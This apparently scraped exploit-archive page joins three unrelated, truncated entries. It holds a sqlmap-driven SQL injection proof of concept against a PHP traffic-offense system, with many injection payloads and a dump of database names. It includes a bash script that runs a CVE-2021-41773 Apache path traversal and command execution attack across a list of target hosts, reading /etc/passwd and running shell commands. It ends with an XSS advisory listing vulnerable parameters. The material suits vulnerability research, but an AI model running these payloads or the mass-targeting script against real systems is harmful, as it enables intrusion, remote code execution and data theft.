Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

#Response from database - sql error

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:56:37 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7837
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
<br />
<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
[...]

# Request - add '' next to the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response did not return an error - sql injection confirmed

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:58:40 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7214
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="container-fluid">
    <div class="w-100 d-flex justify-content-end mb-2">
        <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
        <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
    </div>
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 3

# Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php

POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
Origin: http://localhost
Content-Length: 1598
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: localhost:80
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
Sec-Fetch-Dest: empty

-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

# Using the sqlmap utility

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:52:47 /2021-10-07/

[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]

Multipart-like data found in POST body. Do you want to process it? [Y/n/q]

[05:52:51] [INFO] testing connection to the target URL
[...]
---
Parameter: MULTIPART #4* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #5* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND 4015=4015 AND 'mPLR'='mPLR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #6* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #2* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #3* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND 5855=5855 AND 'broT'='broT
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--
[...]

# Dump user, used database, all databases on the server using sqlmap

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch
[...]
[06:06:23] [INFO] testing MySQL
[06:06:23] [INFO] confirming MySQL
[06:06:24] [WARNING] reflective value(s) found and filtering out
[06:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.48, PHP 7.4.23
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:06:24] [INFO] fetching current user
[06:06:24] [INFO] resumed: 'root@localhost'
current user: 'root@localhost'
[06:06:24] [INFO] fetching current database
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
current database: 'traffic_offense_db'
[06:06:24] [INFO] fetching database names
[06:06:24] [INFO] retrieved: 'information_schema'
[06:06:24] [INFO] retrieved: 'mysql'
[06:06:24] [INFO] retrieved: 'performance_schema'
[06:06:24] [INFO] retrieved: 'phpmyadmin'
[06:06:24] [INFO] retrieved: 'test'
[06:06:24] [INFO] retrieved: 'test2'
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] test2
[*] traffic_offense_db

[06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost'

[*] ending @ 06:06:24 /2021-10-07/
HireHackking 
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
HireHackking 
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Stored and XSS Reflected

# All requests can be sent by both an authenticated and a non-authenticated user

# XSS Stored - example vulnerable pages and parameters:

* The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters
* We can upload SVG file from XSS to all places in webapp
* We can add evil code from admin account, regular user account and unauthenticated - we needs only request

* http://localhost/traffic_offense/admin/?page=user
  Parameters:
  - firstname
  - lastname
  - user image - svg file with javascript code - XSS
  
* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
  Parameters:
  - date_created
  - ticket_no
  - officer_id
  - officer_name
  - status
  - remarks
  - SVG file with javascript code - XSS 

* All application is vulnerable

# XSS Reflected - example vulnerable pages and parameters:

* http://localhost/traffic_offense/admin/?page
  Parameters:
  - page
  
* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
  
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
  
* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - XSS Reflected

